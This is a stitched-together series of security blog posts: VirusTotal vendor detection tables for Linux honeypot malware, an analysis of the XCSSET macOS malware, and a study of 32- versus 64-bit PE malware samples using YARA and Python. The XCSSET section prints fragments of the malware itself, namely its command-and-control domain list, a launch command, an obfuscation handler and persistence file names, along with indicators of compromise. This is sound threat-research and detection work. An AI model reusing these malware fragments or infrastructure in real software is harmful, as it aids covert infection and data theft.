TotalDefense

0

11

1781

1792

eGambit

0

14

1778

1792

Kingsoft

0

1783

9

1792

Acronis

0

1792

0

1792

Invincea

0

11

1781

1792

CrowdStrike

0

1792

0

1792

F-Prot

0

11

1781

1792

VBA32

0

1792

0

1792

APEX

0

1792

0

1792

tehtris

0

1777

15

1792

SUPERAntiSpyware

0

1792

0

1792

Webroot

0

1792

0

1792

SymantecMobileInsight

0

1792

0

1792

Qihoo-360

0

11

1781

1792

Cybereason

0

1671

121

1792

Endgame

0

11

1781

1792

Alibaba

0

1792

0

1792

Bkav

0

1792

0

1792

Trapmine

0

1746

46

1792

Paloalto

0

1792

0

1792

Cylance

0

1787

5

1792

This also highlights towards the end of this list vendors that did not have any results. Looking at some of the most popular providers, we also see a difference with naming of threats.

Avast Result

 Count

VirusTotal  Suggested Threats

Other:Malware-gen [Trj]

517

trojan.shell/linux’, ‘trojan.shell/malkey’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/bash’, ‘trojan.linux/sshbru’, ‘trojan.linux’

BV:Downloader-AAN [Drp]

185

downloader.linux’, ‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’

BV:Downloader-AEH [Drp]

146

‘downloader.miraia/bash’, ‘trojan.linux/mirai’, ‘downloader.linux’, ‘downloader.gen2’, ‘downloader.bash/linux’, ‘downloader.’, ‘downloader.shell’, ‘downloader.bash/miraia’

BV:Agent-BAP [Trj]

97

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

BV:Downloader-II [Trj]

93

‘trojan.shell/vsntcg22’, ‘downloader.’, ‘downloader.jvhi/shell’, ‘downloader.shell’, ‘downloader.shell/linux’

BV:Downloader-OJ [Drp]

78

‘trojan.shell’, ‘downloader.shell’, ‘trojan.shell/gen2’

ELF:Mirai-BOD [Trj]

25

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

ELF:Xorddos-AB [Trj]

23

‘trojan.linux/xorddos’

BV:Downloader-APV [Drp]

19

‘downloader.bash/miraib’, ‘downloader.miraib/bash’

ELF:Miner-KC [Trj]

19

‘trojan.linux’, ‘trojan.linux/uselvhs22’, ‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’

BV:Downloader-APK [Drp]

17

‘downloader.bash/miraib’, ‘trojan.linux/shell’, ‘downloader.shell/bashdlod’, ‘downloader.miraib/bash’

ELF:BitCoinMiner-HF [Trj]

9

‘miner.linux/camelot’

ELF:Mirai-ADP [Trj]

9

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

ELF:Mirai-AHC [Trj]

5

‘trojan.linux/mirai’

Perl:IRCBot-AD [Trj]

4

‘ircbot/perl’

Perl:IRCBot-D [Trj]

4

‘trojan.perl/shellbot’

ELF:Mirai-ARL [Trj]

4

‘trojan.linux/gafgyt’

ELF:Mirai-BWY [Trj]

4

‘trojan.mirai/linux’

BV:Downloader-AMZ [Drp]

4

‘trojan.shell/smlbr’, ‘trojan.smlbr/shell’

ELF:Mirai-AAJ [Trj]

3

‘trojan.mirai/linux’

Perl:Shellbot-O [Trj]

2

‘trojan.perl/shellbot’

ELF:Mirai-BXS [Trj]

2

‘trojan.mirai/linux’

ELF:MiraiDownloader-MX [Trj]

1

‘trojan.linux/mirai’

ELF:Goldfishgang-A [Bot]

1

‘trojan.mirai/linux’

ELF:Mirai-APD [Trj]

1

‘trojan.mirai/linux’

ELF:MiraiDownloader-MR [Drp]

1

‘downloader.linux/mirai’

Avast and AVG have the same results and numbers, although this is likely due to Avast acquiring AVG in 2016 [6].

GData Result

 Count

 VirusTotal Suggested Threats

Trojan.Shell.Agent.V

452

‘trojan.shell/linux’, ‘trojan.shell/malkey’

Trojan.Shell.Agent.U

100

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

Script.Trojan.Agent.Q2DN10

73

‘downloader.’, ‘downloader.shell’, ‘downloader.shell/linux’

Trojan.GenericKD.39794855

56

‘trojan.shell’

Trojan.GenericKD.50084125

32

‘trojan.’, ‘trojan.linux/bruteforce’, ‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux’

Linux.Trojan.Mirai.B

29

‘trojan.mirai/linux’, ‘trojan.linux/mirai’

Linux.Application.CoinMiner.AH (2x)

20

‘trojan.linux/shell’, ‘trojan.linux/bash’

Script.Trojan.Agent.SLJ1UA

20

‘trojan.shell’, ‘trojan.shell/gen2’

Trojan.Linux.GenericKD.39722060

15

‘trojan.linux/multiverze’, ‘trojan.linux/tygpz’

Trojan.Downloader.JVHI

13

‘downloader.jvhi/shell’

Trojan.Linux.Generic.208033

12

‘trojan.linux/xorddos’

Generic.Bash.MiraiA.30F5F415

11

‘downloader.bash/miraia’

Trojan.Linux.GenericA.73252

11

‘trojan.linux/xorddos’

Generic.Bash.MiraiB.CB1F6D93

10

‘downloader.miraib/bash’

Script.Trojan.Agent.Z0E85G

10

‘downloader.shell/bashdlod’, ‘trojan.linux/shell’

Generic.Bash.MiraiA.1042638E

9

‘downloader.miraia/bash’

Trojan.Linux.Generic.261801

8

‘trojan.linux/shell’

Generic.Bash.MiraiA.FC226613

8

‘downloader.bash/linux’

Trojan.Linux.GenericKD.40003689

8

‘trojan.linux’, ‘trojan.linux/uselvhs22’

Generic.Bash.MiraiA.37E69EBB

7

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9FE00F4A

7

‘downloader.bash/miraia’

Generic.Bash.MiraiA.F71C9D36

7

‘downloader.bash/miraia’

Generic.Bash.MiraiB.43209CEF

7

‘downloader.miraib/bash’

Generic.Bash.MiraiA.C840B7CF

6

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.B7AF6546

6

‘downloader.bash/miraia’

Generic.Bash.MiraiA.76F02707

6

‘downloader.bash/miraia’

Trojan.GenericKD.61105047

6

‘trojan.linux/shell’

Trojan.Linux.Agent.IOS

5

‘trojan.linux/mirai’

Backdoor.Perl.Shellbot.F

5

‘trojan.perl/shellbot’

Generic.Bash.MiraiA.F31D7395

5

‘downloader.bash/miraia’

Trojan.GenericKD.50646874

5

‘trojan.’

Trojan.Linux.GenericKD.49342126

5

‘trojan.linux/mirai’

Generic.Bash.MiraiA.53DA044C

5

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.CDE0B287

5

‘downloader.bash/linux’

Generic.Bash.MiraiA.5A5455F1

5

‘downloader.bash/miraia’

Trojan.GenericKD.46067161

4

‘trojan.linux’

Trojan.GenericKD.46077164

4

‘trojan.linux/shell’

Trojan.GenericKD.48821331

4

‘trojan.’

Trojan.GenericKD.39722073

4

‘trojan.linux’

Application.Linux.Generic.9905

4

‘trojan.linux/gafgyt’

Generic.Bash.MiraiA.2B19920F

4

‘downloader.miraia/bash’

Generic.Bash.MiraiA.AB3356B6

4

‘downloader.linux/bash’

Generic.Bash.MiraiA.90D485C3

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.1BB22156

4

‘downloader.bash/miraia’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.77A820C1

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9F225672

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.C00C7246

4

‘downloader.bash/linux’

Generic.Bash.MiraiA.261F2800

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.91B96D6D

4

‘downloader.bash/miraia’

Generic.Bash.MiraiA.8525AE6B

4

‘downloader.bash/miraia’

Generic.Bash.MiraiB.81B3B899

4

‘trojan.miraib/bash’

Generic.Bash.MiraiA.42A992E0

4

‘downloader.bash/miraia’, ‘downloader.linux/bash’

Linux.Trojan.Agent.FRYE0V

3

‘trojan.mirai/linux’

Generic.Bash.MiraiB.EB588E65

3

‘downloader.miraib/bash’

Generic.Bash.MiraiA.F4E0D44D

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9FAC84B8

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.42844671

3

‘downloader.bash/miraia’

Trojan.GenericKD.50084126

3

‘trojan.linux/shell’

Linux.Trojan.Mirai.E

3

‘trojan.mirai/linux’

Trojan.Linux.Mirai.GDC

3

‘trojan.linux/mirai’

Generic.Bash.MiraiA.49306ADF

3

‘downloader.linux/bash’

Generic.Bash.MiraiA.F9E49AE2

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.87330CC0

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A6961F86

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.29E60E32

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.1DCA368B

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.32EA1F82

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.370A6145

3

‘downloader.bash/linux’

Generic.Bash.MiraiA.88F9FED5

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A6CEE47A

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.6215B474

3

‘downloader.miraia/bash’

Generic.Bash.MiraiA.BF170979

3

‘downloader.linux/bash’, ‘downloader.bash/linux’

Linux.Application.CoinMiner.AH

3

‘trojan.linux/sshbru’

Generic.Bash.MiraiA.8991856A

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.D4BA1004

3

‘downloader.bash/miraia’

Generic.Bash.MiraiA.EE96A6CC

3

‘downloader.bash/miraia’

Generic.Bash.MiraiB.C122DEF0

2

‘trojan.miraib/bash’

Linux.Trojan.Agent.21WIPQ

2

‘trojan.linux/mirai’

Script.Trojan.Agent.D34HUR

2

‘downloader.linux’

Backdoor.Perl.Shellbot.B

2

‘trojan.perl/shellbot’

Generic.Bash.MiraiA.19B73922

2

‘downloader.miraia/bash’

Generic.Bash.MiraiA.F9CC4608

2

‘downloader.linux/bash’, ‘downloader.bash/linux’

Generic.Bash.MiraiA.E2FF41E4

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.F384FF05

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.03BF947A

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.D2936D49

2

‘downloader.bash/miraia’

Script.Trojan.Agent.XQDCBP

2

‘downloader.linux/shell’

Trojan.Linux.GenericKD.49319781

2

‘trojan.linux/mirai’

Generic.Bash.MiraiA.AFC860A3

2

‘downloader.bash/miraia’

Linux.Trojan.Agent.71ZXJT

2

‘trojan.linux/mirai’

Generic.Bash.MiraiA.0A4B5647

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.3085EB19

2

‘downloader.bash/linux’

Generic.Bash.MiraiA.C8C8B46F

2

‘downloader.linux/bash’

Generic.Bash.MiraiA.E0206CAA

2

‘downloader.miraia/bash’

Generic.Bash.MiraiA.AFD545E8

2

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9DFBA98D

2

‘downloader.bash/linux’

Generic.Bash.MiraiA.77508253

2

‘downloader.bash/miraia’

Trojan.Linux.Generic.266531

2

‘trojan.linux/shell’

Generic.Bash.MiraiA.999DC364

2

‘downloader.bash/miraia’

Generic.Bash.MiraiB.C388CEE8

1

‘downloader.miraib/bash’

Trojan.Linux.Generic.258109

1

‘trojan.linux/mirai’

Generic.Bash.MiraiB.9F77C950

1

‘downloader.miraib/bash’

Gen:Variant.Trojan.Linux.Mirai.8

1

‘trojan.mirai/linux’

Trojan.GenericKD.48821326

1

‘trojan.linux’

Trojan.Linux.Generic.207109

1

‘trojan.linux/shell’

Generic.Bash.MiraiA.F7E66D30

1

‘downloader.bash/miraia’

Linux.Trojan.Agent.0JQTA6

1

‘trojan.linux/mirai’

Generic.Bash.MiraiA.6AB1054A

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.E4FF83F6

1

‘downloader.bash/miraia’

Linux.Trojan.Mirai.J

1

‘trojan.mirai/linux’

Generic.Bash.MiraiA.06015B18

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.716695BA

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.CA694A08

1

‘downloader.bash/linux’

Generic.Bash.MiraiA.7D12497D

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.24330190

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.7AD1CA92

1

‘downloader.bash/linux’

Generic.Bash.MiraiA.9A967DD3

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.A3F75002

1

‘downloader.linux/bash’

Generic.Bash.MiraiB.83D16FFF

1

‘downloader.bash/miraib’

Generic.Bash.MiraiA.7176EFCA

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.BBDDAFB3

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.9C2BFED6

1

‘downloader.bash/miraia’

Generic.Bash.MiraiA.27A5FB7E

1

‘downloader.bash/miraia’

Generic.Bash.MiraiB.A8550CC8

1

‘downloader.bash/miraib’

Script.Trojan.Agent.SSSDZG

1

trojan.shell/smlbr’

 

Microsoft Result

 Count

 VirusTotal Suggested Threats

TrojanDownloader:Linux/Morila!MTB

118

‘trojan.linux/shell’, ‘downloader.bash/linux’, ‘downloader.bash/miraia’, ‘downloader.linux/bash’, ‘downloader.linux/shell’

Backdoor:Linux/IRCbot.YA!MTB

95

‘trojan.shell/linux’, ‘trojan.linux/shell’, ‘trojan.ircbot/shell’, ‘trojan.ircbot/linux’, ‘trojan.linux/ircbot’, ‘trojan.shell/ircbot’

Trojan:Linux/Multiverze

58

‘trojan.linux/uselvhs22’, ‘trojan.linux/mirai’, ‘trojan.linux/tygpz’, ‘trojan.mirai/linux’, ‘trojan.linux/multiverze’

TrojanDownloader:Linux/Morila.B!MTB

57

‘downloader.bash/miraia’, ‘downloader.bash/linux’

TrojanDownloader:Linux/ShWg.YB!MTB

54

‘downloader.bash/miraia’, ‘trojan.linux/shell’, ‘downloader.bash/linux’

Trojan:Script/Wacatac.B!ml

40

‘downloader.bash/miraib’, ‘trojan.miraib/bash’, ‘trojan.mirai/linux’, ‘downloader.miraib/bash’

HackTool:Linux/Sshbru!MTB

26

‘trojan.linux/shell’, ‘trojan.linux’, ‘trojan.linux/sshbru’

DoS:Linux/Xorddos.A

23

‘trojan.linux/xorddos’

Trojan:Linux/CoinMiner!rfn

16

‘trojan.linux/shell’

Trojan:Linux/CoinMiner.N!MTB

9

‘miner.linux/camelot’

HackTool:Linux/Sshbru!rfn

8

‘trojan.linux/shell’, ‘trojan.linux/sshbru’, ‘trojan.linux/bruteforce’

Backdoor:Linux/Mirai.BO!MTB

6

‘trojan.linux/mirai’, ‘linux’

Trojan:Win32/Occamy.CAD

4

‘trojan.linux’

Backdoor:HTML/Derflop.A

4

‘trojan.perl/shellbot’

Backdoor:Linux/Gafgyt.A!MTB

4

‘trojan.linux/gafgyt’

Trojan:Unix/Multiverze

3

‘trojan.linux/shell’

Trojan:Linux/Mirai.AB!MTB

2

‘downloader.bash/miraia’

Trojan:Linux/Downldr.AE!MTB

2

‘downloader.bash/miraia’

Backdoor:Linux/Mirai.AN!xp

1

‘trojan.mirai/linux’

Trojan:Linux/ZkarletFlash

1

‘trojan.mirai/linux’

Backdoor:Linux/Mirai.AW!MTB

1

‘trojan.mirai/linux’

TrojanDownloader:Linux/Mirai.C!MTB

1

‘downloader.linux/mirai’

 

Summarized and detailed hash data can be downloaded from here [7]. 

When using tools like VirusTotal it is important to be aware of name changes over time and that vendors have their own naming schemes. Make sure that you’re using the latest available results and using the “Reanalyse File” option within VirusTotal to update analysis information. 

[1] https://www.virustotal.com
[2] https://isc.sans.edu/honeypot.html
[3] https://github.com/jslagrew/cowrieprocessor/blob/main/submit_vtfiles.py
[4] https://en.wikipedia.org/wiki/Mirai_(malware)
[5] https://exceljet.net/formula/xlookup-latest-by-date
[6] https://www.comparitech.com/antivirus/avast-vs-avg/
[7] https://www.dropbox.com/sh/jswjv5mlvku0ep7/AADm5vyoR8Jwil7_BgqXjz7ra?dl=0

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

I recorded a video for yesterday’s diary entry James Webb JPEG With Malware.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

20220902-204822.png

On Wednesday’s stormcast, Johannes talked about a JPEG picture (coming from the Jales Webb telescope) that malware authors had laced with malware.

Threat actors behind the XCSSET malware have been relatively quiet since last year. However, new activity beginning around April 2022 and increasing through May to August shows that actors have not only adapted to changes in macOS Monterey, but are preparing for the demise of Python, an integral and essential part of their current toolkit.

In this post, we review changes made to the latest versions of XCSSET and reveal some of the context in which these threat actors operate.

XCSSET Changes in 2022

Since XCSSSET first appeared, the authors have made consistent use of two primary tools to obfuscate both droppers and dropped files: SHC and run-only compiled AppleScripts, respectively.

SHC-compiled shell scripts are opaque to traditional static scanning tools and contain only a few human-readable strings.

As all SHC-compiled binaries, legitimate or malicious, contain these same strings, signature scanners cannot distinguish between them.

SHA1: 127b66afa20a1c42e653ee4f4b64cf1ee3ed637d

Dynamic execution of this recent SHC-compiled XCSSET dropper, currently with 0 detections on VirusTotal despite having been known for 2 months, also reveals that the malware authors have changed from hiding the primary executable in a fake Xcode.app in the initial versions in 2020 to a fake Mail.app in 2021 and now to a fake Notes.app in 2022. These fake apps are invariably dropped in a parent folder created in random locations in the user’s Library folder. When executed, this particular sample writes the fake Notes.app to:

~/Library/Application Scripts/com.apple.CalendarAgent

The updated run-only AppleScripts that XCSSET drops as second-stage payloads use a collection of newly-registered domains:

set domains to {

“superdocs.ru”,

“melindas.ru”,

“kinksdoc.ru”,

“adobefile.ru”,

“gurumades.ru”,

“appledocs.ru”,

“45.82.153.92”,

“gismolow.com”,

“Cosmodron.com”

}

Changes in the replicator.applescript file, which infects users’ Xcode projects with the XCSSET malware, show that both curl’s –max-time value and the script’s phaseName variable have now been randomized, presumably to hamper static detection or hunting rules.

Xcode infection script from 2021 (Left) and 2022 (Right)

The –max-time option is now set to a random value between 5 and 9, while phaseName is chosen from the following list:

“Copy Bundle Frameworks”,

“Compile Binary Libraries”,

“Compile Swift Frameworks”,

“Binary Frameworks Compiler”

In the previous version of XCSSET, the malware created and dropped files for its own caches and control functions in a folder at ~/Library/Caches/GeoServices/. This has been modified slightly to “GitServices”.

Persistence plists are currently chosen from the following list:

com.apple.airplay.plist

com.apple.spx.plist

com.google.keystore.plist

com.google.chrome.plist

and target a file at one of:

~/Library/Caches/GitServices/CloudServiceWorker

~/Library/Caches/GitServices/AppleWebKit

As previously, XCSSET continues to attempt to evade detection by masquerading as either system software or the almost ubiquitous Google and Chrome browser software.

XCSSET’s Updated Fake Notes.app

As noted, XCSSET makes use of a fake Notes.app to hide the primary executable, a.scpt, itself launched by the run-only compiled AppleScript main.scpt when “Notes” is executed via the dropped LaunchAgent.

The SHC-compiled dropper script defines several random paths to use as parent directories for the fake Notes.app.

osacompile -x -e try do shell script “osascript ‘/Users/user1/Library/Application Support/com.apple.spotlight/Notes.app/Contents/Resources/Scripts/a.scpt'” end try -o

The a.scpt remains, in essence, the same as earlier versions except that the encoding handler has changed from one previously shared with OSAMiner.

on xe(_str)

set x to id of _str

repeat with c in x

set contents of c to c – (102 – 2)

end repeat

return string id x

end xe

on xex(_str)

set x to id of _str

repeat with c in x

set contents of c to c – (102 – 1)

end repeat

return string id x

end xex

Malicious Run-Only AppleScripts

Aside from a.scpt, XCSSET makes use of multiple run-only AppleScripts. Although these scripts are written to disk as compiled and run-only, we were able to capture the scripts in plain text on the wire. In the updated version of XCSSET, these continue to target Telegram and other chat apps heavily in use by Chinese users such as WeChat and Tencent’s 360, along with an expanded list of browsers, including Opera, Brave, Edge and other Chromium-based browsers.

Many of the scripts shown above share the same structure and list of handlers but make minor changes to handle the specifics of each target application.

check_loop()

log(message)

runme()

upload(filePath, fileName)

urlencode(theText)

The contacts.applescript has the role of targeting various chat apps from which to steal and exfiltrate data.

Among other tasks, the payloader.applescript checks for AppleBackLightDisplay, presumably to distinguish between laptops and desktops. This info is part of what is exfiltrated, showing that the threat actors are keen to gather very precise hardware profiling information.

Similarly, the threat actors are interested in exactly how up-to-date the victim is with Apple’s XProtect and MRT malware removal tool, presumably all the better to target them with more effective payloads. The listing.applescript script is used for this purpose.

Also of interest is the use of the public service transfer.sh for exfiltrating data files that are too large for the attacker’s server.

XCSSET Changes for Monterey and Python

One of the more interesting things we noted in recent samples of XCSSET is the developer’s awareness of OS versions and the clear intent that the authors are here for the long run.

Right from its initial version, XCSSET made use of python scripts for certain functions, in particular for dropping fake application icons on the Dock. It achieved this by abusing a public Github repo called DockUtil. In the latest version, we also note that XCSSET uses python to parse and steal data from the user’s (legitimate) Notes.app. For this functionality, they use a modified version of a plugin from a legitimate python-based tool called mac_apt used by macOS forensics experts.

mac_apt on Github (left); malware script found in XCSSET (right)

XCSSET’s authors have updated their AppleScripts to account for Apple’s recent removal of python 2. The following image shows how the malware authors updated their safari_remote.applescript for python3 and Monterey 12.3 and above.

Similarly, the comment in edge_remote.applescript shows that the authors are keenly aware that DockUtil and other utilities will need to be replaced in their toolkit in the near future.

XCSSET Threat Actors and Targets

While very little is publicly known about the actors behind XCSSET, their motivations or their exact targets, the actors have engaged with journalists and security researchers at times. The original version of XCCSET, which appeared in August 2020, contained the full names of two individuals. Subsequently, a Twitter account with the name ‘Hans’ briefly became active and sent private messages to a journalist, claiming that he was the real author and not the two individuals whose names appeared in the malware code. The same individual claimed that the targets were “developers from China” and “big gambling business”.

‘Hans’ subsequently disappeared from view, but about a year later another Twitter account in the name of ‘Vlad F’ began reaching out to researchers, complaining that they had been falsely accused of being the actors behind the malware.

While Apple refused to comment on these claims at the time, Vlad F’s Twitter account ceased to respond. Earlier this year, however, Chinese users reported XCSSET infections and attempts to unlock stolen “accounts” from victims in return for “200 USDT” (a so-called “stable” bitcoin belonging to Tether).

Prior to that, researchers had noticed that XCSSET infections were being embedded in a number of Github repositories.

It seems a new trojan is going around and affecting @Apple #iOS builds. I don’t know the original method of infection, but I’m starting to see some public repos on GitHub being affectedhttps://t.co/EmutE0jCbD

— Pier Fumagalli 💉💉💉🦠💉😷 (@ianosh) June 4, 2021

At this point in time, it’s unclear whether these infected repos are victims or plants by threat actors hoping to infect unwary users. It has been suggested that unsuspecting users may be pointed to the infected repositories through tutorials and screencasts for novice developers. Our research into XCSSET and its infection vectors continues.

Staying Protected Against XCSSET Malware on macOS

XCSSET has many moving parts, and samples change rapidly. While some static signatures such as those used in Apple’s XProtect service will detect known samples, full protection against evolving threats like these is only really possible with a multi-engine agent including behavioral AI.

SentinelOne Singularity fully protects SentinelOne customers against XCSSET malware.

With the agent policy set to ‘Protect’, the malware is prevented from executing or dropping any of its components. For this demonstration, we set the policy to ‘Detect-only’ in order to observe further stage payloads.

Indicators of Compromise

Scripts
25f8d7ac99e00c9d69679f2d9aca5954d2609a03 ./brave_remote.applescript
0e1b2f01441e6e6fc8a48a7871e649d3647828cd ./canary_remote.applescript
4c368635ecfee61a89203f3f0e84bfdd7d85073d ./chrome_remote.applescript
2a2330b13886ffe0e4fe54f7254008490814b5fa ./chromium_remote.applescript
fd82b821fa2c23f2b88f64179e3a7a8905c1e40b ./contacts.applescript
bde20788e2656454052aae9baf2f4d2b7c256c9d ./edge_remote.applescript
3f35fd8306d4a05fadd9095acacd8d5f297a112e ./firefox_remote.applescript
3de232d0a42959b20703ebb9d9376b3ef3d3015d ./firewall_off.applescript
3257a1f540455444a56975e7fd9cdb6f8148b828 ./listing.applescript
2dbf06445a294b4f786501ef16ea4aabd8e1ad72 ./notes.applescript
6c0b4e3e3bac36f3228e69ab1e53884f76f6828b ./notes.py
6cf1ec6af6c6102c9d4929b1a83e0a463e737255 ./notes_app.applescript
73918b840384e485d009632fdf1a396758d7c515 ./opera_remote.applescript
e2de10a6b517e298cb2e7da150224dfe7e5717a7 ./payloader.applescript
5e673f4c494c424ae450f2ea5c0b066f912edccb ./pods_infect.applescript
73d9a443933fb0c40dde3065ec77adad35a5c49a ./remove_old.applescript
5b66e4b1556ad03b4bf072d061de0606eabe8603 ./replicator.applescript
672837de18d0e34f8b2a77bc2646b245671c83dc ./safari_remote.applescript
b66dbd55ce42a61cfedd06f31725b7f56d10d548 ./safari_update.applescript
fb29c9daa6fdeaa945446fe7cde185d51296dc7d ./telegram.applescript
760676a2e05d25959dee1f9ffaf3042e5f2e0f31 ./telegram_lite.applescript
4ffb268475e3816b22aadfb147bd7cd2f211e3d5 ./uploader.applescript
c2a90c68ad9d93139ebce981a409beae5d7de8bf ./yandex_remote.applescript
d70f4974bd531af674c5c2da3bc3c7d1a0ac9b54 ./360_remote.applescript
a57b73190525a729d821b6aed6849084fc1beddd ./a.applescript

Binaries
127b66afa20a1c42e653ee4f4b64cf1ee3ed637d ./exec.2430808
f4099a0884d3f1bf5602c8c6ba5265b76d7f4953 ./Pods
dde87aefcaf788f770e5e1229db4fe73873e1c36 ./agentd
bd13d22095d377938c50088e59fa3079143cb0f2 ./braved
a1449c5fbf8cf126502bd68a8e8d657b3dcfd87a ./canaryd
cbf08fae71fcd46cc852fad7502685466c40e168 ./edged
2a62d6bcac7b0c5e75f561458e934ec45c77699c ./firefoxd
263b243df32be6d9d9878c459d2fc6491342d547 ./metald
f3a747bf10763d7d8c1cd9ccedd1e25ee195fce3 ./open
2a6d37160f21ec13aa6c692a3ca3374db3d35e96 ./operad
1396fdbff38b787d14b1135dcdfc367658669637 ./speedd
e4b6c56faa97493dc0f0f7c4fc2196096ef66513 ./yandexd

Communications
adobefile[.]ru
appledocs[.]ru
Cosmodron[.]com
gismolow[.]com
gurumades[.]ru
kinksdoc[.]ru
melindas[.]ru
superdocs[.]ru
45[.]82[.]153[.]92

Last week, I was teaching FOR610 in Amsterdam. When we review ASM, we have a module about the difference in 32-bits VS. 64-bits code (how parameters are passed to functions/API calls, calling convention, etc). It’s important to have an understanding of this because most computers are build around a 64-bits CPU today. But attackers are still deploying a lot of 32-bits malware for compatibility reasons and also because this code can be run without (if you respect Microsoft guidelines and API’s) problems. A student asked me if there was a lot of native 64-bits malware in the wild. Is there a real trend? I decided to have a look at a bunch of samples and see practically if this trend was real.

The problem is to get enough samples. I’ve my own “malware zoo” but it’s pretty small. You can try to get samples from major players like VirusTotal but your API quotas won’t probably allow you to download a lot of samples. I decided to have a look at free resources (but still trusted). My choice was to use MalwareBazaar[1]. I like this service provided by abuse.ch. They allow to download samples for free and report also some interesting stats based on YARA rules[2].

I downloaded all daily archives from Feb 27 2020 until last week (217GB of zip archives). To detect if a PE file is 32-bits or 64-bits code, you just check a few bytes at the beginning of the file:

00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ…………..
00000010: b800 0000 0000 0000 4000 0000 0000 0000 ……..@…….
00000020: 0000 0000 0000 0000 0000 0000 0000 0000 …………….
00000030: 0000 0000 0000 0000 0000 0000 8000 0000 …………….
00000040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 ……..!..L.!Th
00000050: 6973 2070 726f 6772 616d 2063 616e 6e6f is program canno
00000060: 7420 6265 2072 756e 2069 6e20 444f 5320 t be run in DOS
00000070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 mode….$…….
00000080: 5045 0000 4c01 0900 8406 f862 0000 0000 PE..L……b….
00000090: 0000 0000 e000 2e03 0b01 0223 0004 ac00 ………..#….
000000a0: 005a e900 0008 0000 b014 0000 0010 0000 .Z…………..
000000b0: 0020 ac00 0000 4000 0010 0000 0002 0000 . ….@………
000000c0: 0400 0000 0100 0000 0400 0000 0000 0000 …………….
000000d0: 00c0 e900 0004 0000 179d e900 0200 4001 …………..@.

If you read “PE..L”, it’s a 32-bits sample, if it’s “PE..d”. I wrote a quick and dirty YARA rule to match these sequences of bytes:

rule pe32bits
{
meta:
description = “Match a 32-bits PE”
strings:
$a = {50 45 00 00 4c}
condition:
$a in (0..500)
}
rule pe64bits
{
meta:
description = “Match a 64-bits PE”
strings:
$a = {50 45 00 00 64}
condition:
$a in (0..500)
}

 Because I had a lot of ZIP archives to process and to not use too much storage, I used Python to process all files from ZIP archives and use the YARA rule against them. I focussed only on “.exe” and “.dll” files:

#!/usr/bin/python3
import datetime
import glob
import re
import yara
from zipfile import ZipFile
rules = yara.compile(filepath=’3264.yar’)
print(“data,file,arch”)
zipList = glob.glob(‘*.zip’)
for zip in zipList:
day = datetime.datetime.strptime(zip.split(“.”)[0], ‘%Y-%m-%d’).strftime(“%d/%m/%Y %H:%M:%S”)
with ZipFile(zip, ‘r’) as zipObj:
zipObj.setpassword(b”infected”)
files = zipObj.infolist()
for f in files:
if re.match(r'[0-9]+.*.(exe|dll)’, f.filename):
with zipObj.open(f.filename,mode=’r’) as fdata:
matches = rules.match(data=fdata.read())
if len(matches) > 0:
print(“%s,%s,%s” % (day, f.filename, matches[0]))

Let’s have a look at the results. I loaded the CSV file in my Splunk.

175.962 samples have been inspected (only EXE & DLL files)
10.952 were detected as 64-bits code (6.224%)
Only 1 DLL was detected as 64-bits code (HASH:86150c570e2d253d54fd5f70c9fe62ff37897dc3a7b21658fa891263a843790d)

If we check on a timeline, we have a small trend:

I’ve no idea about the peak of samples submitted in November 2021 but we see that, especially the last months, they are more and more 64-bits samples in the wild. Can we rely on these statistics? Samples downloaded from MalwareBazaar are only the visible part of the iceberg but, as it became popular, many security researchers use it. If you have other statistics, please share with us!

[1] https://bazaar.abuse.ch
[2] https://bazaar.abuse.ch/export/json/yara-stats/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

